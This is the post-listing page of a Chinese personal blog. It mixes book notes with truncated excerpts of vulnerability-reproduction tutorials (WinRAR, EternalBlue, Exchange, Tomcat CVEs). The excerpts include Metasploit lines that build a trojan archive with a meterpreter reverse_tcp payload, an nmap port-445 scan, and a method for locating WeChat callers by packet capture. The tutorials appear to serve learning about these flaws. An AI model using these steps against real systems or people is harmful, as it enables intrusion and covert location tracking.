落落闲情

曲径通幽处 悠然见南山

知乎好句摘录

有哪些知识,你知道后你的世界马上就不一样了? 合适的装扮,会为你的出场疯狂加分。合适的装扮,会为你的出场疯狂加分。 人间不值得的意思,不是不值得来人间一趟,而是不值得为人间的琐事烦恼和担心。 遇到越是意料之外的事情,越要淡定。 凡事用力过猛,注定会「翻车」,就比如,连续5小时学习工作,会让你产生厌倦. 人各有异,有观点就会有争论。 收到回复是交流的基本礼貌 如果没有什么特殊的情况,别人发消息......

Posted by 杨斌 on 2020-04-27

读书

《非暴力沟通》笔记

[美] 马歇尔 第一章 让爱融入生活 也许我们并不认为自己的谈话方式是“暴力”的, 但我们的语言确实常常引发自己和他人的痛苦 -Etty Hillesum 本书中 “NVC”指非暴力沟通或爱的语言 人生的抉择非暴力沟通指导我们转变谈话方式和聆听方式. 我们不再条件反射式的反应,而是去明了自己的观察,感受和愿望,有意识的使用语言.我们既诚实,清晰的表达自己,又尊重与倾听他人. 听到批评时,我......

Posted by 杨斌 on 2020-04-01

读书

CVE-2018-15982 Adobe Flash Player 漏洞复现

漏洞介绍Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。 漏洞演示 木马制作Poc: https://github.co......

Posted by 杨斌 on 2020-03-26

CVE 漏洞

CVE-2017-8464(震网三代)漏洞复现

漏洞介绍该漏洞的原理同2010年美国和以色列入侵并破坏伊朗核设施的震网行动中所使用的穿透核设施隔离网络的漏洞(CVE-2010-2568)非常类似,「它可以很容易的被黑客利用来攻击基础设施、存放关键资料的核心隔离系统等」。「当存在漏洞的电脑被插上保存有漏洞文件的U盘时,不需要额外操作,漏洞攻击程序就可以执行并完全控制用户的电脑系统」。 使用工具metasploit framework. 步骤......

Posted by 杨斌 on 2020-03-26

CVE 漏洞

CVE-2018-20250(WinRAR代码执行)漏洞复现

生成winrar木马12345678910use exploit/windows/fileformat/winrar_aceSET FILENAME resume.rar # 木马文件名称SET FILE_LIST /home/files.txt # 其他压缩文件目录文件set PAYLOAD [PAYLOAD]. windows/meterpreter/reverse_tcp by de......

Posted by 杨斌 on 2020-03-26

CVE 漏洞

MSF永恒之蓝漏洞复现

永恒之蓝是指2017年5月12日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。 因为永恒之蓝攻击的是445端口, 扫描局域网中所有开放的445端口 1nmap -sS -p 445 192.168.1.1-245 打开MSF, 加载扫描模块, 扫描靶机是否存在该漏洞1234us......

Posted by 杨斌 on 2020-03-26

漏洞

《影响力》笔记

《影响力》 [美]罗伯特-B.西奥迪尼 本书着重于顺从心理学的社会研究. 到底是什么因素让一个人对另外一个人说‘行’. 影响力的武器 人和动物一样,在特定场景中会触发人们的一种自动响应机制. 当某一个触发特征出现时,我们会不假思索的作出相应的反应,之所以这样,就是因为我们被难以察觉的影响力武器摆布了. “一分钱一分货”, 当人们对某一件东西不甚了解时,就会通过价格判断,贵=好. 珠宝店的老板......

Posted by 杨斌 on 2020-03-24

读书

微信语音/视频通话定位

通过测试发现微信语音/视频通话能够定位到对方的位置. 使用电脑无线网卡共享无线网络, 手机连接至电脑WIFI, 使用wireshark抓包,微信语音视频通话通过UDP协议, 因此我们用ip.addr == 手机IP地址 && udp表达式来过滤数据包,语音电话接通之后会大量的数据包刷出来,通过IP反查即可获取到对方的地理位置. IP精确定位网站 https://www.c......

Posted by 杨斌 on 2020-03-21

漏洞

CVE-2020-0688 Microsoft Exchange远程代码执行漏洞 Exploit

漏洞说明微软邮件服务器Microsoft Exchange Server爆出远程代码执行漏洞.该漏洞是由于Exchange Control Panel(ECP)组件中使用了静态秘钥(validationKey和decryptionKey)所导致的。 所有Microsoft Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decrypt......

Posted by 杨斌 on 2020-03-12

CVE 漏洞

CVE-2020-1938 Tomcat任意文件下载漏洞

漏洞说明该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。 受影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.......

Posted by 杨斌 on 2020-03-09

CVE 漏洞
RECENT POSTS
archives
categories
ESC